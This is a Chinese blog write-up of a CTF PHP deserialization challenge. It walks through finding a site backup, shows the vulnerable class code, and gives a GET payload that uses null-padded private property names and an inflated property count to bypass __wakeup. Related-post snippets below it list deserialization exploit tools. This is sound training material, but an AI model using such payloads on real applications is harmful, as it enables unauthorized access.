[极客大挑战 2019]PHP(反序列化漏洞中存在private变量)

最新推荐文章于 2023-12-14 11:29:23 发布
最新推荐文章于 2023-12-14 11:29:23 发布
阅读量2.4k 收藏 3
点赞数 2
分类专栏: CTF刷题 WEB 文章标签: php 安全 python 反序列化漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45844670/article/details/108934194
版权

根据题目提示“我经常备份”,推测可能是网站备份在某个路径下

使用dirmap扫描得到

在这里插入图片描述
下载得到一个压缩包,里面是网站的源码
在这里插入图片描述
里面的flag是假的

我们分析index.php和class.php

index.php里面的php代码
<?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?>

这里是引用了class.php文件,用get方法传入一个select变量,然后对其进行反序列化

class.php里面的代码
<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

class中的类有两个private变量

其中的析构函数__destruct只有在对象被垃圾收集器收集前(即对象从内存中删除之前)才会被自动调用。析构函数允许我们在销毁一个对象之前执行一些特定的操作,例如关闭文件、释放结果集等。

其中执行了两个判断:password是否为100,username是否为admin

也就是说我们需要在创建对象的时候(构造函数__construct)传入’admin’,100

<?php


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }
	
	
}

$a=new Name('admin',100);
echo serialize($a);
?>

这里不需要__destruct函数,所以只取前几个函数
得到

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

这里我们就需要用到一个知识:

https://blog.csdn.net/weixin_45844670/article/details/108171963

payload:
?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

利用里面的方法就得到flag

Kal1
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
------已搬运-------关于GET方式传入PHP反序列化的字符串时private和protected的注意点
Zero_Adam的博客
01-25 673
关于GET方式传入PHP反序列化的字符串的注意点 注意private属性和protected属性的,不一样哦 在传入private属性的时候,应该是s:14:"%00Name%00username"会在属性名前加上类名,并且类名左右有%00。 protected属性也是应该是s:5:"%00*%00bb"会在属性名前面加上*,而且*两边有%00 。 所以真要GET传参的时候应该是:O:4:"Name":4:{s:14:"%00Name%00username";s:6:"nonono";s:14:"%00
private反序列化特点
qq_48511129的博客
12-13 996
<?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this->username = $username; $this->password = $pa
php序列化私有变量,php序列化变量的随笔 - 华陌网 生活 百科 资讯
weixin_42365422的博客
03-16 219
我在处理一个购物车的类时候,因为自己对$_SESSION进行了特殊处理,现在需要把购物车对象的信息放入 $_SESSION,直接处理object到我的$_SESSION里面是失败的,我就对它进行了序列化处理。处理是没有问题的,但是调用反序列化后的成员函数就出现了错误,__PHP_Incomplete_ClassObject的问题。问题其实很简单,就是反序列化处理的实例没有找到类的定义,处理的方法...
PHP反序列化
L0g1c的博客
10-22 1196
反序列是指把对象转换为字符串的过程,便于在内存、文件、数据库保存、传输,PHP使用serialize函数进行序列化。 运行结果为 各个字符的意义:字母O代表Object,a代表array,s代表string,i 表示数字 O代表Object对象,6代表类名(Person)的长度是6,3代表类的属性有3个。{}内就是类的属性信息,每个属性以分号;结束。 s代表string类型,4代表属性名(name)的长度,name后面是属性值,string类型,数值长度为3,数值为php。若类属性值未初始化,则默认值
php反序列化
weixin_52397172的博客
08-23 634
php序列化简介
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化和反序列化过程安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用
最新发布
07-01
【作品名称】:基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞反序列化漏洞通常出现在程序,当接收到从网络或持久存储读取的数据,并将其转换回原来的对象实例时...
深入浅析PHP的session反序列化漏洞问题
10-19
主要介绍了PHP的session反序列化漏洞问题,需要的朋友可以参考下
php反序列化漏洞
wuqingsix的博客
12-03 168
一、 基础知识程序未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,通过在参数注入一些代码,从而达到代码执行,SQL 注入,目录遍历等不可控后果,危害较大。序列化就是将对象object、字符串string、数组array、变量,转换成具有一定格式的字符串,使其能在文件储存或传输的过程保持稳定的格式。当变量是私有或受保护的属性时类成员属性:%00为空白符,空字符也有长度,一个空字符长度为 1,%00 虽然不会显示,但是提交还是要加上去。
php序列化和反序列化public、private、public的区别
catch
12-14 427
private变量名前添加标记\00(classname)\00,变量名字字母个数+2+类名字母个数: s:12:"\00Orange\00name";protected在变量名前添加标记\00*\00,变量名字字母个数+3: s:7:"\00*\00name";public无标记,变量名不变,长度不变: s:4:"name";*php序列化和反序列化public、private、public的区别。
PHP——serialize()序列化类变量public、protected、private的区别
Ho1aAs‘s Blog
05-27 2778
文章目录serialize()对于类变量public、protected、private序列化的区别完 serialize() serialize($value)用于序列化,支持除了resource的任何类型,它将传参转化成字节流,便于存储,返回字符串,并且可以迭代嵌套 当序列化对象时,PHP 将试图在序列动作之前调用该对象的成员函数 __sleep()。这样就允许对象在被序列化之前做任何清除操作。 对于类变量public、protected、private序列化的区别 运行以下代码: <?php
php序列化私有变量,PHP变量进行序列化和反序列化的方法
weixin_32999557的博客
03-16 663
序列化是将变量转换为可保存或传输的字符串的过程;反序列化就是在适当的时候把这个字符串再转化成原来的变量使用。这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。1. serialize和unserialize函数,这两个是序列化和反序列化PHP数据的常用函数。$a=array('a'=>'Apple','b'=>'banana','c'=>'Coconut');//...
序列化与反序列化
夜晓星的博客
01-31 138
实体 public class User implements Serializable{          private String id;     private String name;               public String getId() {         return id;     }     public void setId(String id) {  ...
PHP变量序列化serialize与unserialize
wingbywings的专栏
07-13 807
PHP有类似于json的数据格式,即serialize序列化变量。 把变量存为特定字符串,这样将方便做很多事情。数组变量可以实现文件储存,SESSION储存,POST传递等。 $arr = array('name'=>'gimi','age'=>'7'); $arr_s = serialize($arr); ...... $arr = unserialize($arr_s);
PHP通过类的反射, 对类的私有属性赋值
s1095622320的博客
05-15 544
需赋值的类 <?php namespace App\xxx; class Goods { private $good_id; private $name; public function setGoodId($good_id) { $this->good_id = $good_id; } public function getGoodId() { return $this->good_id;
序列化和反序列化
熊猫拿铁
12-01 95
序列化和反序列化 概念: 序列化: 将程序的对象,以二进制形式写入文件; 对象序列化流:ObjectOutputStream 反序列化: 将文件的二进制数据,读回程序,重构成对象; 对象反序列化流:ObjectInputStream 注意:需要被序列化的对象的类,必须实现Serializ//反序列化 private void read() throws Except...
PHP反序列化知识点
小小鱼的博客
03-23 172
protected 声明的字段为保护字段,在所声明的类和该类的子类可见,但在该类的对象实例不可见,也就不能输出。因此保护类的变量在序列化时,前面会加上\0*\0的前缀。这里的 \0 表示 ASCII 码为 0 的字符(不可见字符),而不是 \0 组合。private 声明的字段为私有字段,只在所声明的类可见,在该类的子类和该类的对象实例均不可见,也就不能输出。因此私有类的变量在序列化时,前面都会加上\0类名\0的前缀。s:17:“\00类名\00op”;
php反序列化漏洞习题
09-06
关于PHP反序列化漏洞的习题,可以使用GlobIterator类和ArrayObject类来进行练习。其,GlobIterator类的题目是被遗忘的反序列化,ArrayObject类的题目是easy_phpPHP反序列化漏洞是一种安全漏洞,其一个具体的例子是CVE-2016-7124,该漏洞存在php5<5.6.25和php7<7.0.10的版本漏洞的产生原因是由于反序列化时对输入的不当处理所导致的。 了解PHP反序列化漏洞的习题,需要掌握类与对象、反序列化基础知识以及一些与魔术方法相关的内容,如构造和折构方法(__construct()、__destruct())、序列化和反序列化方法(__sleep()、__wakeup())、错误调用魔术方法(__callStatic()、__get()、__set()、__isset()、__unset()、__clone())等。反序列化漏洞的成因较复杂,例如POP链构造、POC链反推法等。 此外,还可以学习字符串逃逸和__wakeup魔术方法绕过漏洞的相关知识。其,__wakeup魔术方法绕过漏洞的产生原因是__wakeup方法可以在反序列化时被绕过,从而可能导致安全漏洞PHP反序列化漏洞还可以通过引用的利用方法来进行学习。另外,还可以学习SESSION反序列化漏洞和phar反序列化漏洞的习题。其,SESSION反序列化漏洞涉及到不同处理器的不同储存格式,而phar反序列化漏洞需要了解phar的构造和使用条件。 通过这些习题的学习,可以更好地理解PHP反序列化漏洞以及如何进行防范和修复。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [PHP反序列化漏洞(最全面最详细有例题)](https://blog.csdn.net/m0_73728268/article/details/129893800)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值